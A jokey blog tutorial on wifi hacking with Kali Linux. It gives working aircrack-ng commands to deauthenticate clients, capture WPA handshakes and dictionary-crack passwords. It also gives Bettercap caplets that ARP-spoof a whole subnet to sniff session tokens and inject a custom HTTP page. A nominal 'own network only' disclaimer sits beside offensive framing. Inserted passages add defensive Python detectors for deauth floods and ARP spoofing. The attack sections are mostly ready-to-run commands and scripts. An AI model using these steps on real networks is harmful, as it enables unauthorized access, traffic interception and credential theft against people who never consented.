Well well well… look who’s searching for sketchy things online. You’ve just been added to a watchlist. And at what cost? So you don’t miss out on cat memes? Look, I get it, but it’s illegal and…

…it just so happens that I also love cat memes. So yes, I will teach you how to hack wireless networks.

In this article, you will learn how to:

  • Disconnect devices from an access point and prevent them from reconnecting
  • Crack wifi passwords to gain access to a network
  • Attack the devices on a network

By the end, you’ll also have a solid understanding of the underlying mechanics of wireless networks.

However, be aware that breaking into your neighbor’s wifi is illegal. So of course, the knowledge provided is purely for educational purposes. For kicks and giggles if you will. Do not use any of these techniques against any networks (besides your own) unless you have explicit permission.

 

How do my devices connect to the Internet?

If you are unfamiliar with how wifi operates, the next two sections will get you caught up. You can skip these but I highly recommend you do not.

 

Network interfaces

A “network” is a collection of interconnected devices that communicate with each other and can vary in size:

  • Local Area Network (LAN): These networks connect devices within a small area, like within your home or school
  • Wide Area Network (WAN): These networks connect devices over much larger areas, such as entire cities, countries, or continents. The Internet is a global WAN

A “network interface” is the means by which a device communicates with other devices on a network – whether physical (such as two computers connected by an Ethernet cable), wireless (wifi/Bluetooth/cellular), or virtual (a virtual connection to a remote VPN server).

Each network interface has its own unique Medium Access Control (MAC) address which acts as an identifier for the device.

A physical Network Interface Card (NIC) with an Ethernet port.

You can view the network interfaces of a device in a terminal with:

  • ip: This command will return details of all the interfaces, both physical and virtual. It replaces the mostly-deprecated “ifconfig” command
  • iw: This command will just return details of the wireless interfaces (wifi interfaces). It replaces the mostly-deprecated “iwconfig” command

 

WiFi networks

If you have wifi in your home, your modem connects your home network to your Internet service provider (ISP). Your modem gets a single public Internet Protocol (IP) address to identify it on the Internet. This public IP address is then shared with the WAN interface of your router.

In order to share this Internet connection, a wireless access point (WAP) (typically built into your router) creates and broadcasts the wifi network with an SSID (the name of the network). The network name shown in your device’s wifi settings is the SSID your router is broadcasting.

The router is responsible for assigning unique private IP addresses to all the devices connected to the wifi network. This is handled by the Dynamic Host Configuration Protocol (DHCP).

The router is often referred to as your “gateway” to the Internet.

 

The Address Resolution Protocol (ARP) then associates the IP address with the MAC address of your device. When other devices on the network want to communicate with you, or when you want to communicate with them, an ARP request is broadcast. The device with the requested IP address will respond with its MAC address.

Each device stores a list of MAC and IP address pairs in its “ARP table”. By looking at the entries in the ARP table, a device can determine if the device it wants to communicate with is on the same network.

If it is, the device can send the data directly to the target device using the MAC address stored in the ARP table. However, if the destination device is not on the same local network, the router will need to forward the data to the appropriate network, using its own IP and MAC address for routing purposes.

When a device communicates with the WAN of the Internet, the router performs a process called Network Address Translation (NAT). NAT translates the private IP address of the device to the router’s public IP address. This allows multiple devices on the local network to share the same public IP when accessing external resources. The router then forwards the data to the modem, which sends it along to the ISP. The ISP routes the data to the public IP address of the intended destination.

Once the data returns, it follows the reverse path: the modem receives the response, the router performs NAT to map the public IP back to the appropriate private IP address, and forwards it to the device that made the original request.

 

To get started, you will need…

A wifi adapter is a wireless network interface and you will need one that is suitable for hacking.

To follow along, you will need to buy a wifi adapter with a chipset and driver software that supports “monitor mode”. Here is an extensive list of adapters that will work out-of-the-box. I am using the ALFA Network AWUS036ACM Long-Range Dual Band wifi USB Adapter.

Also note that all instructions will be in the context of the Kali Linux distribution. If you are using a different operating system or Linux distribution, refer to the installation instructions according to the official documentation of the tools.

 

Cracking wifi passwords

We covered this briefly in another article but in case you missed it…

Let’s start by learning how to carry out a dictionary attack in order to discover someone’s wifi password. This technique will work against older security standards: WEP, WPA, and WPA2. These standards provide authentication, encryption, and data integrity checks, but they are vulnerable to password cracking attacks if you are able to capture the packets that are exchanged when a client joins a wireless network.

“When a client joins a network? So I’ll have to wait until someone manually connects to the target wifi network?” – You, circa maybe right now.

Well, instead of waiting around, we can forcefully disconnect any currently connected devices. When they reconnect automatically, we’ll get what we need.

For this attack, we will use the Aircrack-ng toolkit, as it comes preinstalled on Kali.

In the following steps and commands, values within angle brackets (<>) should be replaced with your appropriate values.

1. View your wireless network interfaces:

iwconfig

2. Now, plug in your wifi adapter to view the adapter’s network interface name:

iwconfig

You will see an additional entry, in this case wlan1.

3. Terminate any running processes that may conflict with monitor mode:

sudo airmon-ng check kill

4. Enable monitor mode:

sudo airmon-ng start <wlan1>

Notice that the adapter receives a new name when monitor mode is enabled (wlan1mon).

5. Scan for nearby wireless access points:

sudo airodump-ng <wlan1mon>

6. In the ESSID column, find the table row associated with your wireless network name. Exit using CTRL+C.

7. Target your network using the BSSID and CH number obtained in the previous step, specify a name for the output files that will be generated, and provide your adapter’s wlan name:

sudo airodump-ng -c <CH number> --bssid <target MAC address> -w <file name> <wlan1mon>

8. Open a new terminal and execute a deauthentication attack by running the following command to forcefully disconnect all devices on your wireless network. No device will be able to reconnect until you stop the attack with CTRL+C*:

sudo aireplay-ng -0 0 -a <target MAC address> <wlan1mon>

*Though we will still capture the connection packets required to crack the password, modern wifi access points may prevent consistent deauthentication. However, if your router is outdated, these attacks will successfully block devices from reconnecting until you stop with CTRL+C.

9. Once a client reconnects, notice the WPA handshake: <target MAC address> message in the upper right corner of the airodump-ng terminal.

10. Add your valid wifi password to a wordlist and save the change. You can insert it into one of the preinstalled wordlists with:

sudo nano /usr/share/wordlists/dirb/big.txt

11. Use ls to view the output files. To crack the wifi password, perform a dictionary attack using a wordlist that contains your valid password against the .cap file:

aircrack-ng -w /usr/share/wordlists/dirb/big.txt <file name>.cap

12. You will see the message KEY FOUND! [ <valid password> ] once the match is made.

To regain wifi on your own device, restart it or:

1. Take the adapter out of monitor mode (back to managed mode):

sudo airmon-ng stop wlan1mon

2. Restart the killed processes:

sudo systemctl start NetworkManager && sudo systemctl start wpa_supplicant
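As an added defender-side example (not from the original article or the Aircrack-ng suite), the parser below decodes raw 802.11 deauthentication and disassociation frames and counts them per BSSID, so a monitor-mode capture can be checked for the kind of flood step 8 produces. The frames, MAC addresses and threshold are constructed sample data, and the builder only assembles bytes in memory.

```python
import struct
from collections import Counter

# IEEE 802.11 management-frame subtypes (frame type 0) that kick a client off.
DEAUTH, DISASSOC = 0xC, 0xA
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def parse_kick_frame(frame):
    """Parse the 24-byte 802.11 header plus reason code; None unless deauth/disassoc."""
    if len(frame) < 26:
        return None
    fc0 = frame[0]  # frame control byte 0: version | type | subtype
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)  # frame body begins at byte 24
    return {"subtype": "deauth" if subtype == DEAUTH else "disassoc",
            "dst": mac_str(frame[4:10]), "src": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]), "reason": reason}

def build_deauth(dst, src, bssid, reason=7, seq=0):
    """Assemble deauth frame bytes in memory (nothing is transmitted); sample data only."""
    return (bytes([0xC0, 0x00]) + struct.pack("<H", 0)  # frame control + duration
            + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
            + struct.pack("<H", seq << 4) + struct.pack("<H", reason))

def detect_deauth_flood(frames, threshold=10):
    """Count deauth/disassoc frames per BSSID and return those at or above threshold.

    A burst of broadcast deauths carrying the AP's own address is what the
    'aireplay-ng -0 0' flood from step 8 looks like in a monitor-mode capture.
    """
    counts = Counter()
    for f in frames:
        p = parse_kick_frame(f)
        if p is not None:
            counts[p["bssid"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}

# Constructed sample: 12 broadcast deauths spoofed from AP ...:01, one legitimate
# unicast deauth from AP ...:02, and a data frame (type 2) the parser ignores.
AP1, AP2 = "aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"
SAMPLE = [build_deauth(BROADCAST, AP1, AP1, seq=i) for i in range(12)]
SAMPLE.append(build_deauth("11:22:33:44:55:66", AP2, AP2, reason=3))
SAMPLE.append(b"\x08\x00" + b"\x00" * 30)
print(detect_deauth_flood(SAMPLE))  # {'aa:bb:cc:dd:ee:01': 12}
```

The actual mitigation is enabling 802.11w Protected Management Frames on the access point, which makes clients reject unauthenticated deauth frames; the detector still shows you that someone is trying.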

Now that you have the password, you can gain access to the network. If this was a network other than your own, you would have what the kids call “unauthorized access”. To attack other devices on the network, let’s switch to another tool.

 

Bettercap

Bettercap is a comprehensive network monitoring and Man-in-the-Middle (MITM) tool that you can use to carry out a variety of attacks.

Its main advantage over other tools is its ease of use, thanks to its module system. Each module provides certain functions to control the tool or perform network operations. These functions can be further configured by providing values to their available parameters, giving you fine-tuned control.

With “caplets” you can combine these modules and pre-define parameters to script entire attacks. The installation comes with a set of official caplets, located in the /usr/share/bettercap/caplets directory.

On Kali Linux, you can install Bettercap with:

sudo apt install bettercap

 

What else is on the network?

Launch Bettercap with sudo bettercap, then scan the network to discover the other connected devices:

net.probe on

Your results should be similar to mine. In the list you will notice familiar items, such as the “smart” devices and gaming consoles in your home. As you can see, we now know each device’s IP and MAC address.

To see the results listed in a table, use:

net.show

Pro-tip: You can achieve more detailed results using nmap:

sudo nmap -sS -sV -O 192.168.0.0/24 -oN nmap_scan.txt

You could even add --script=vuln to the scan to test for known vulnerabilities and exploit them using tools like Metasploit. But, we’ll cover that another day.

 

ARP spoofing attacks

With a list of targets in hand, we can now carry out attacks. Remember how devices on the network will use their ARP tables to identify each other?

Using Bettercap’s arp.spoof module, we can target the ARP tables of other devices on the network so they associate the MAC address of our device with the router’s IP address. Once the other devices update their ARP tables with this deceptive information, they will unknowingly send their outbound traffic to us instead of the router.

Exit Bettercap by entering q and let’s make a caplet for this attack:

sudo nano /usr/share/bettercap/caplets/arp-spoof.cap

The contents of the file will be:

# Exclude https, dns, and mdns requests from the feed.
events.ignore net.sniff.https
events.ignore net.sniff.dns
events.ignore net.sniff.mdns
# Discover devices on the network.
net.recon on
net.probe on
# Capture both inbound and outbound traffic.
set arp.spoof.fullduplex true
# ARP spoof all devices on the network.
set arp.spoof.targets 192.168.0.0/24
# Execute the attack.
arp.spoof on
# View live-feed of traffic.
net.sniff on

Run the caplet with:

sudo bettercap -caplet arp-spoof.cap

If someone was using a website that used HTTP instead of the secure, encrypted version of the protocol, HTTPS, you would see the traffic in its human-readable cleartext form. You can test this by visiting a purposefully vulnerable website like http://zero.webappsecurity.com/login.html.

As you navigate the site, you will see sensitive data such as session tokens and account information in the Bettercap feed.
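An added example, not from the article or Bettercap, that turns the ARP-table explanation above into a check: it parses raw ARP packets and flags any reply that rebinds an already-known IP (the gateway in particular) to a different MAC, which is the change arp.spoof pushes to each victim. The gateway address, MACs and packets are constructed sample data.

```python
import struct
from ipaddress import IPv4Address

GATEWAY_IP = "192.168.0.1"  # assumed gateway on the article's 192.168.0.0/24

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def parse_arp(pkt):
    """Parse a 28-byte Ethernet/IPv4 ARP packet (RFC 826); None if it is not one."""
    if len(pkt) < 28:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack_from("!HHBBH", pkt, 0)
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return {"op": "request" if oper == 1 else "reply",
            "sender_mac": mac_str(pkt[8:14]), "sender_ip": str(IPv4Address(pkt[14:18])),
            "target_mac": mac_str(pkt[18:24]), "target_ip": str(IPv4Address(pkt[24:28]))}

def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Build raw ARP packet bytes; used here only to construct the sample traffic."""
    return (struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
            + mac_bytes(sender_mac) + IPv4Address(sender_ip).packed
            + mac_bytes(target_mac) + IPv4Address(target_ip).packed)

def detect_arp_spoof(packets, gateway_ip=GATEWAY_IP):
    """Trust the first IP->MAC binding seen in ARP replies (arpwatch style) and
    flag any later reply that claims the same IP from a different MAC, which is
    exactly what arp.spoof sends to each victim for the router's address."""
    table, alerts = {}, []
    for pkt in packets:
        a = parse_arp(pkt)
        if a is None or a["op"] != "reply":
            continue
        ip, mac = a["sender_ip"], a["sender_mac"]
        trusted = table.setdefault(ip, mac)
        if trusted != mac:
            alerts.append({"ip": ip, "trusted_mac": trusted, "claimed_mac": mac,
                           "gateway": ip == gateway_ip})
    return alerts

# Constructed sample: the victim asks who has the gateway IP, the real router
# replies, then a second host replies for the same IP with its own MAC.
VICTIM, GW_MAC, ROGUE = "aa:bb:cc:00:00:42", "aa:bb:cc:00:00:01", "de:ad:be:ef:00:01"
SAMPLE = [build_arp(1, VICTIM, "192.168.0.42", "00:00:00:00:00:00", GATEWAY_IP),
          build_arp(2, GW_MAC, GATEWAY_IP, VICTIM, "192.168.0.42"),
          build_arp(2, ROGUE, GATEWAY_IP, VICTIM, "192.168.0.42")]
print(detect_arp_spoof(SAMPLE))  # [{'ip': '192.168.0.1', ..., 'gateway': True}]
```

On a real host the same check can be run against the output of ip neigh, and a static ARP entry for the gateway (or switch-level dynamic ARP inspection) stops the rebinding from taking effect.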

 

Injection attacks

With Bettercap’s http.proxy module, you can modify HTTP traffic in real-time. This module acts as a transparent proxy, allowing you to inject JavaScript code, modify page content, and manipulate HTTP requests and responses. You can replace images, inject custom HTML, modify form submissions, and even serve completely custom web pages.

Let’s create a caplet that will serve a custom web page. First make a new directory to store the two files we will create:

sudo mkdir /usr/share/bettercap/caplets/proxy-page

Next, create a proxy-page.js file:

sudo nano /usr/share/bettercap/caplets/proxy-page/proxy-page.js

Write the following script:

// Bettercap calls onRequest for every HTTP request that passes through the proxy.
function onRequest(req, res) {
    // Only hijack requests for the site root ("/"); everything else passes through.
    if (req.Path == "/") {
        res.Status = 200;
        res.ContentType = "text/html";
        res.Body = "<html><body><h1>Well hello! You have been hacked friend!</h1></body></html>";
        return true;
    }
}

Now, let’s write the .cap file:

sudo nano /usr/share/bettercap/caplets/proxy-page/proxy-page.cap

# Everything included in arp-spoof.cap plus:
# Our custom page will be displayed anytime a user visits the base domain of any website.
events.ignore net.sniff.https
events.ignore net.sniff.dns
events.ignore net.sniff.mdns
net.recon on
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.0.0/24
# Load the proxy script and enable the transparent HTTP proxy.
set http.proxy.script ./proxy-page.js
http.proxy on
arp.spoof on
net.sniff on

Run the caplet with:

sudo bettercap -caplet proxy-page/proxy-page.cap

Every time someone navigates to the base domain of an HTTP website, our page will be displayed instead. Test it out by visiting example.com.

 

Basic Bettercap usage

There are many more types of attacks and options available when using Bettercap. Before I leave you to your own devices, let’s cover some basic usage to get you started.

If you need to use your wifi adapter, you can specify the interface at launch using:

sudo bettercap -iface <adapter wlan>

You can view a list of available commands with: help

A list of the available modules and their status will also be included in the output of help. At any time, you can view the currently enabled modules using active.

View a more detailed list of modules in the official documentation.

To view the available functions and parameters of a certain module, use: help <module>

A value can be assigned to a parameter using the set keyword:

set <parameter name> <value>

You can set multiple parameters using semicolons as delimiters:

set <parameter name> <value>; set <parameter name> <value>; set <parameter name> <value>;

With the -eval flag, instead of configuring an attack during runtime, you can enable modules and set parameters at startup to launch directly into an attack:

sudo bettercap -iface wlan1 -eval "set <parameter name> <value>; set <parameter name> <value>; <module name> on; <module name> on"

View a list of all event ids in the official documentation.

The ticker module can be used to execute commands at regular intervals:

set ticker.period <time in seconds>; set ticker.commands "<module name> <parameter>"; ticker on


 

Bettercap Web UI

Bettercap also provides a web user interface. With Bettercap running, you can download and install the latest stable release of the web UI with:

ui.update

Open a new terminal window and change the default username and password in both the http-ui.cap and https-ui.cap files:

sudo nano /usr/share/bettercap/caplets/http-ui.cap
sudo nano /usr/share/bettercap/caplets/https-ui.cap

Back in the terminal with Bettercap running, launch the web UI with:

https-ui

Navigate to https://localhost:443 in your browser. Since the generated SSL/TLS certificate is self-signed, you will get a browser warning. Click Advanced… and select Accept the Risk and Continue since we know the certificate.

Enter your credentials to log in.

“Hold on. Can’t connect to ‘https://127.0.0.1:8083/api’?”

We will also need to add a certificate exception for the API server. Open Firefox’s setting page and type certificates in the Find in Settings search bar. Click on View Certificates.

In the Servers tab, you will notice the exception we made when we navigated to the page. Click Add Exception… and type https://127.0.0.1:8083 to the Location input field. Then, click Get Certificate. Ensure the Permanently store this exception checkbox is checked and click Confirm Security Exception.

You will see the new entry in the table. Click OK.

You should now be able to log in to the web UI dashboard successfully.

Now, you can operate Bettercap with a more user-friendly interface. The modules are listed horizontally at the top and you can set parameters in the Advanced page. Certain functions are available as buttons and you can enter commands in the Command bar … input field.

 

Conclusion

Now, you can kitten scroll (quit doomscrolling) to your heart’s content. Using YOUR wifi network of course. If you ever forget YOUR wifi password, instead of performing a factory reset, you now know how to make guesses by the millions. Bookmark this article for quick reference and check back in as we may continue learning from here in future articles.

Who knows, maybe next time I’ll teach you how to build a portable device for wifi hacking shenanigans…

Behave. Remember, you are now on that watchlist.

Love,

Ninjeeter